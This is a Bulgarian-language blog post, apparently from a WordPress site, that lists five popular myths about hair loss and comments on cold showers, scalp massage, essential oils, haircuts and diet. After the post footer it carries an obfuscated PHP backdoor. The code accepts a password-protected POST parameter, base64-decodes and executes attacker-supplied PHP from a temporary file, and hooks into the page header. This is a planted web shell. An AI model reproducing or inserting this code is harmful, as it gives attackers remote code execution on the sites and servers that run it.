Косопад – ТОП 5 митове за косопад | Косопад

Топ 5 на митовете за косопад

Оплешивяване и косопад са сред най – известните проблеми в съвременното общество. Както и при всяка друга популярна тема, за тези състояния на косата съществуват голям брой митове и легенди. Някои от тях са верни, други не. Вижте пет от най – популярните слухове на тема косопад.

митове за косопад

Митове за косопад

Студената вода предпазва от косопад

Въпреки че един студен душ действително подобрява циркулацията на кръв и оросяването, той определено не може да спре оплешивяването, ако то вече е завладяло скалпа. Истината е, че къпането със студена вода е полезно не само за сърдечната дейност, но и като силно средство против стрес, който пък от своя страна е един от основните причинители на косопад. Но не очаквайте чудеса от студената вода, тя ще помогне в някаква степен, но няма да ви спаси.

Масажът и редовното разресване предпазват от косопад

Това е един от най – спорните въпроси в дерматологията и в частност при лечението на косопад. Голяма част от специалистите смятат, че масажирането и разресването на косата подобряват кръвообращението и така помагат, но според други тези процедури само пречат. Според някои от теориите, твърде честото миене изтощава косъма и в крайна сметка той умира.

Третирането с етерични масла предпазва от оплешивяване

До голяма степен това твърдение е истина и полезните съставки в натуралните масла наистина помагат при косопад. Тази техника обаче не действа при всички пациенти, а при някои дори засилва проблема, тъй като при тях кожата и космените фолукили се раздразват, вместо да се успокоят.

Редовното подстригване е сигурно средство срещу косопад

Много мъже бръснат главите си нула номер с надеждата, че косата им ще стане по – гъста и хубава. За съжаление трябва да ги разочароваме, защото подстригването и бръсненето на практика не оказват почти никакво въздействие върху космения фоликул. Положително влияние за растежа може да има само филирането на косата.

Храната няма никакво отношение към косопада

Това напълно не е вярно. За да имате здрава и красива коса, трябва да приемате достатъчно богати на полезни вещества храни. Специално срещу косопад те трябва да са богати на протеин, витамини и желязо, тъй като тези елементи са особено важни за състоянието на косъма. Яжте смело риба, зеленчуци, ядки и млечни продукти, които ще ви помогнат да бъдете красиви.

08. май 2013 16:16:26 от Косопад
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}